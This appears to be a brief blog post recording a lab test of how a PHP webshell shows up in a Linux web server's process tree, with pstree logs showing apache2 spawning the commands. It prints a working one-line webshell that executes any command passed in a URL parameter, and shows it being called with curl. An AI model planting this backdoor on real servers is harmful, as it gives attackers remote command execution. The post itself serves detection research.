Memo on Webshell process tree

Posted on by Tony3

Tested to see how webshell process tree look like on linux web server.

Sample webshell code. (Do not abuse this code for malicious purpose.)

$ cat webshell.php 
<?php echo(exec($_GET["cmd"])); ?>

Invoking whoami command via webshell.

$ curl -i http://localhost/webshell.php?cmd=whoami
HTTP/1.1 200 OK
Date: Thu, 23 Feb 2023 15:41:31 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Content-Length: 8
Content-Type: text/html

www-data

Bash oneliner to infinitely send whoami command to the webshell.

while true; do curl -i http://localhost/webshell.php?cmd=whoami; done

Bash oneliner to log process tree to the log file mylog.txt infinitely. (So we won't miss the webshell process creation.)

while true; do pstree -a >> mylog.txt; done

Confirmed the web server process apache2 spawning whoami command.

$ grep -C 5 "\-whoami" mylog.txt 
  |   |   |   |   |-apache2 -k start
  |   |   |   |   |-apache2 -k start
  |   |   |   |   |-apache2 -k start
  |   |   |   |   `-apache2 -k start
  |   |   |   |       `-sh -c whoami
  |   |   |   |           `-whoami

IT業従事者。2018年10月末よりシンガポール在住。

Leave a Reply

Your email address will not be published. Required fields are marked *


The reCAPTCHA verification period has expired. Please reload the page.